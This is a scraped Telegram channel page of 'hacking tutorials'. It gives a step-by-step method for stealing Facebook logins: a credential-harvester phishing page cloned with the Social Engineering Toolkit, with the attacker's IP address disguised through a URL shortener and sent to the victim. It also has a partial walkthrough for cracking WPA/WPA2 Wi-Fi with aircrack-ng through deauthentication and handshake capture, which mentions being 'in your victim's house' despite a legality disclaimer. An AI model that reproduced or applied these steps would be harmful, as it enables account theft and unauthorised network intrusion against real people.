Tech Byte
5.1K subscribers
254 photos
3 videos
87 files
192 links
Tech tricks, news, hacking tutorials and dark web guides.

Admin : @anonyguy
Download Telegram
Tech Byte
How to Hack a Facebook Account using Kali Linux 🌐 Official Website ☑️In this guide, I will be showing you how to hack a facebook account using Kali Linux. But first, you have to install Kali on your machine. If you don't know what Kali Linux is, you can…
Hacking Facebook
</lesson_001:> PHISHING

In this method, the attack starts with the creation of a phishing page. The attacker sets the post back IP address to receive the credentials like usernames and passwords. The attacker can then shorten the IP address to make it look like a genuine URL. When the victim visits the URL and feed the login details, the post back feature of the page will send all the data to the attacker.

@TechByte
I'm assuming you have already read about Kali Linux, downloaded and installed it on your PC…Follow this guide to get started with Facebook hacking

1⃣Boot up Kali Linux on your machine and open terminal.
2⃣Type this command in the Kali Linux terminal.
root@kali~# setoolkit
3⃣Enter 'y' to agree the social engineering toolkit terms and conditions.
4⃣Select the following options one by one from the menu
'1' (Social Engineering Attacks) then
'2'(Website Attack Vectors) then
'3'(Credential Harvester Attack) then
5⃣Type '2' (Site cloner)
set:webattack> IP address for the post back in harvesting: 192.168.x.xxx (your ip address)
set:webattack>Enter the url to clone: www.fb.com
6⃣Go to Places > Computer > VAR > WWW and move all the files from www folder to html folder.
7⃣Shorten your IP address with any URL shortener like tinyurl.com and send it to the victim. When the victim open the link and enter the login details , you will get the username and password in a harvester text file which is located at Places > Computer > VAR > WWW

@TechByte
Do you want to know how to hack WiFi?

Share the channel till we hit 1K members, then I'll tell you how
Hacking WI-FI
</lesson_001:> Dictionary/Bruteforce Attack & Aircrack-ng
👇👇👇👇👇👇👇👇👇👇
Kali Linux can be used for many things, but it probably is best known for its ability to penetration test, or “hack,” WPA and WPA2 networks. There are hundreds of Windows applications that claim they can hack WPA; don’t get them! They’re just scams, used by professional hackers, to lure newbie or wannabe hackers into getting hacked themselves. There is only one way that hackers get into your network, and that is with a Linux-based OS, a wireless card capable of monitor mode, and aircrack-ng or similar. Also note that, even with these tools, WiFi cracking is not for beginners. Playing with it requires basic knowledge of how WPA authentication works, and moderate familiarity with Kali Linux and its tools. If you feel you have the necessary skills, let’s begin

These are things that you’ll need:
• A successful install of Kali Linux (which you probably have already done).
• A wireless adapter capable of injection/monitor mode. Some computers have network cards capable of this from the factory. If yours doesn't, like most however, you’ll have to buy an external one. Here is a list of the best: http://blackmoreops.com/recommended-usb-wireless-cards-kali-linux
• A wordlist to attempt to “crack” the password once it has been captured
• Time and patience
If you have these then roll up your sleeves and let’s see how secure your network is!

Important notice: Hacking into anyone’s Wi-Fi without permission is considered an illegal act or crime in most countries. We are performing this tutorial for the sake of penetration testing, hacking to become more secure, and are using our own test network and router.

@TechByte
1⃣ & 2⃣
Log in
@TechByte
‼️Important Note [Edit]
@TechByte
6⃣
7⃣
Tech Byte
8⃣ @TechByte
You can see in this picture, that a client has appeared on our network, allowing us to start the next step.
Tech Byte
🔟 @TechByte
If you didn’t receive the “handshake message,” then something went wrong in the process of sending the packets. Unfortunately, a variety of things can go wrong. You might just be too far away, and all you need to do is move closer. The device you’re attempting to deauth might not be set to automatically reconnect, in which case you’ll either have to try another device, or leave airodump on indefinitely until someone or something connects to the network. If you’re very close to the network, you could try a WiFi spoofing tool like WiFi-honey, to try to fool the device into thinking that you’re the router. However, keep in mind that this requires that you be significantly closer to the device than the router itself. So unless you happen to be in your victim’s house, this is not recommended.
Do note that, despite your best efforts, there are many WPA networks that simply can’t be cracked by these tools. The network could be empty, or the password could be 64 characters long, etc.

@TechByte
Finally...
12. @TechByte

Share this to everyone
Remember, this method👆 only works with WPA/WPA2 networks
Siam 7x: The $550 dual screen smartphone
Front screen: 5.0"
Rear screen: 4.7"
RAM: 2GB
ROM: 16GB
OS: Android 6.0

Review: v.ht/Siam7x